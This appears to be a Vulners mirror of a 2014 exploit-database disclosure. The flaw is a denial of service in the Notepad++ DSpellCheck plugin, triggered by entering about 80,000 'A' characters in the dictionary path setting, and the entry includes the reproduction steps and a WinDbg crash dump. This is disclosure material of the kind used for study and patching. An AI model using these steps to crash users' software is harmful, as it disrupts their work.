Vulners
Lucene search
Notepad++ DSpellCheck v1.2.12.0 - Denial of Service
# Exploit Title: Notepad++ - DSpellCheck v1.2.12.0 plugin[DOS]
# Exploit Author: sajith
# Vendor Homepage: http://notepad-plus-plus.org/
# Software Link: http://notepad-plus-plus.org/download/
# vulnerable plugin Version: DSpellCheck v 1.2.12.0
# Tested in: Windows XP SP3 EN,Notepad ++ 6.5.4
POC:
1)install notepadd ++
2)open up plugins tab and select Dspellcheck and click on settings
3)In "hunspell dictionaries path" field enter large character say 80000 A's
and click on "apply"
##########################################################
(cf8.4f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00690044 ebx=00000000 ecx=00000294 edx=01f56070 esi=01f56060
edi=00000000
eip=7c919fca esp=01d0ed74 ebp=01d0ede8 iopl=0 nv up ei pl zr na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010246
ntdll!RtlpWaitForCriticalSection+0x5b:
7c919fca ff4010 inc dword ptr [eax+10h]
ds:0023:00690054=bc5d0050
####################################################
FAULTING_IP:
ntdll!RtlpWaitForCriticalSection+5b
7c919fca ff4010 inc dword ptr [eax+10h]
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 7c919fca (ntdll!RtlpWaitForCriticalSection+0x0000005b)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 00690054
Attempt to write to address 00690054
FAULTING_THREAD: 000004f8
PROCESS_NAME: notepad++.exe
.
FAULTING_MODULE: 7c900000 ntdll
DEBUG_FLR_IMAGE_TIMESTAMP: 52c4419f
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced
memory at "0x%08lx". The memory could not be "%s".
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx"
referenced memory at "0x%08lx". The memory could not be "%s".
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 00690054
WRITE_ADDRESS: 00690054
FOLLOWUP_IP:
DSpellCheck!setInfo+577f5
012f4cb5 59 pop ecx
CRITICAL_SECTION: 00f56060 -- (!cs -s 00f56060)
BUGCHECK_STR:
APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_WRONG_SYMBOLS
PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE
DEFAULT_BUCKET_ID: STRING_DEREFERENCE
LAST_CONTROL_TRANSFER: from 7c901046 to 7c919fca
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be
wrong.
01d0ede8 7c901046 00f56060 012feb19 01f56060
ntdll!RtlpWaitForCriticalSection+0x5b
01d0ee00 012f4cb5 00000013 012f8787 00000003
ntdll!RtlEnterCriticalSection+0x46
01d0ee48 012f15f0 908eab95 01654af8 00000000 DSpellCheck!setInfo+0x577f5
01d0ee7c 012f166b 01f54058 0130e360 00000040 DSpellCheck!setInfo+0x54130
01d0ee8c 012aecaa 01f54058 0130e360 01f56056 DSpellCheck!setInfo+0x541ab
01d0ee90 01f54058 0130e360 01f56056 00000000 DSpellCheck!setInfo+0x117ea
01d0ee94 0130e360 01f56056 00000000 016549a8 0x1f54058
01d0ee98 01f56056 00000000 016549a8 00000000 DSpellCheck!setInfo+0x70ea0
01d0ee9c 00000000 016549a8 00000000 00000000 0x1f56056
SYMBOL_STACK_INDEX: 2
SYMBOL_NAME: DSpellCheck!setInfo+577f5
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: DSpellCheck
IMAGE_NAME: DSpellCheck.dll
STACK_COMMAND: ~4s ; kb
BUCKET_ID: WRONG_SYMBOLS
FAILURE_BUCKET_ID: STRING_DEREFERENCE_c0000005_DSpellCheck.dll!setInfo
Followup: MachineOwner
####################################################
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1